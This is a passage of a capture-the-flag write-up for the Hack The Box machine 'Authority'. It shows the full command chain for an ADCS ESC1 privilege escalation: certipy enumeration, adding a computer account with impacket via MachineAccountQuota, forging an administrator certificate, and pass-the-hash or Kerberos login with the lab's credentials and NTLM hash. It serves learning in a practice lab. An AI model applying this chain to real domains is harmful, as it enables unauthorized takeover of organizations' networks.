netexec winrm 10.129.20.218 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'

Privilege Escalation

Administrator

Seeing that I can access WinRM I used evil-winrm to do so. evil-winrm -i authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'

I did some manual enumeration for possible priv-esc vectors but I wasn’t able to find anything of use. I looked through the PWM files, SMB shares and user’s files. I downloaded PWM and its config locally, hoping to decrypt the blob with my master key, but couldn’t do it without setting up the full software.

Certipy

I thought of running WinPEAS, BloodHound and Certipy so I started with the latter. certipy find -u svc_ldap@authority.htb -p 'lDaP_1n_th3_cle4r!' -vulnerable -target 10.129.20.218 -dc-ip 10.129.20.218 -stdout

The output showed me that there is an ESC1 vulnerable template called CorpVPN. ESC1 is the first of a number of escalation attacks to ADCS. This one simply enabled you to pretend to be someone else. You request a certificate and choose the identity inside of it like Admin. The CA trusts you and signs it, so you get a valid login as that user. Requirements for it to work:

Enrollee Supplies Subject = True
Client Authentication = True (or a few others)
“User Enrollable Principals” showing a group your user is a part of
Requires Manager Approval = False
Authorized Signatures Required = 0

I tried to run it with the existing user like this certipy req -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -dc-ip '10.129.20.218' -target 'AUTHORITY-CA' -ca 'authority.authority.htb' -template 'CorpVPN' -upn 'administrator@authority.htb' -sid 'S-1-5-21-622327497-3269355298-2248959698-500' but I just later noticed that the user is not a part of any group the template is assigned for.

The only group that is not highly-privileged and can use this template is Domain Computers. Often domain users are able to create a given number of computer hosts which is dictated by a quota parameter - you can quickly check it with netexec.

parrot@parrot (~/Desktop): netexec ldap 10.129.20.218 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -M maq
LDAP 10.129.20.218 389 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 (name:AUTHORITY) (domain:authority.htb) (signing:Enforced) (channel binding:Never) 
LDAP 10.129.20.218 389 AUTHORITY [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r! 
MAQ 10.129.20.218 389 AUTHORITY [*] Getting the MachineAccountQuota
MAQ 10.129.20.218 389 AUTHORITY MachineAccountQuota: 10

Note: this method works only if you use ldap with netexec.

addcomputer.py

This shows us that svc_ldap can add 10 machines total - let’s add one with impacket. addcomputer.py authority.htb/svc_ldap:lDaP_1n_th3_cle4r! -dc-ip 10.129.20.218 -computer-name azaeir$ -computer-pass azaeir.

Let’s check if it was added correctly on the host with Get-ADObject -Filter 'Name -eq "azaeir"' -Properties *.

Assuming, computer account is in Domain Computers group by default we can now run the edited certipy request. Weirdly enough I had a lot of trouble getting the .pfx file still. After a lot of troubleshooting it turns out that i had to specify -method LDAPS in my addcomputer.py command for it to work like so:

addcomputer.py authority.htb/svc_ldap:lDaP_1n_th3_cle4r! -method LDAPS -dc-ip 10.129.20.218 -computer-name azaeir1$ -computer-pass azaeir

I assume this could be because normal computer account creation uses SAMR and when I specify LDAPs if provides proper attributes and trust behavior is set correctly for certipy - just a theory. Both methods added the account to the Domain Computers group.

Anyway, now I could generate that administrator file. certipy req -username 'azaeir1$' -password azaeir -ca AUTHORITY-CA -dc-ip 10.129.20.218 -template CorpVPN -upn administrator@authority.htb -dns authority.htb -debug

This command also works certipy req -u 'azaeir1$@authority.htb' -p 'azaeir' -dc-ip '10.129.20.218' -ca 'AUTHORITY-CA' -template 'CorpVPN' -upn 'administrator@authority.htb' -target authority.authority.htb -target-ip 10.129.20.218

I adjusted my time using sudo ntpdate authority.htb and ran certipy auth -pfx administrator.pfx -dc-ip 10.129.20.218 to get the TGT as well as NTLM hash.

TGT: administrator.ccache
NTLM: aad3b435b51404eeaad3b435b51404ee:6961f422924da90a6928197429eea4ed

As both Kerberos and NTLM are allowed on the host we have two ways to authenticate. With NTLM we get the NT hash and run evil-winrm -i authority.htb -u administrator -H 6961f422924da90a6928197429eea4ed

With Kerberos:

Check if you don’t have any unexpected tickets assigned with klist
Change the kerberos cache you’re using with export KRB5CCNAME=administrator.ccache and double-check if it worked with echo $KRB5CCNAME and klist
run one of impacket tools that suits the ports you have access impacket-wmiexec -k -no-pass AUTHORITY.HTB/Administrator@authority.authority.htb

Closing Thoughts

Authority is an interesting take on Windows and Active Directory attacks, it demonstrates a mix of known techniques and a niche pathways that I was not familiar with. It took a seemingly trivial AD privilege escalation and introduced a number of fun challenges that made the box interesting at each part of completion.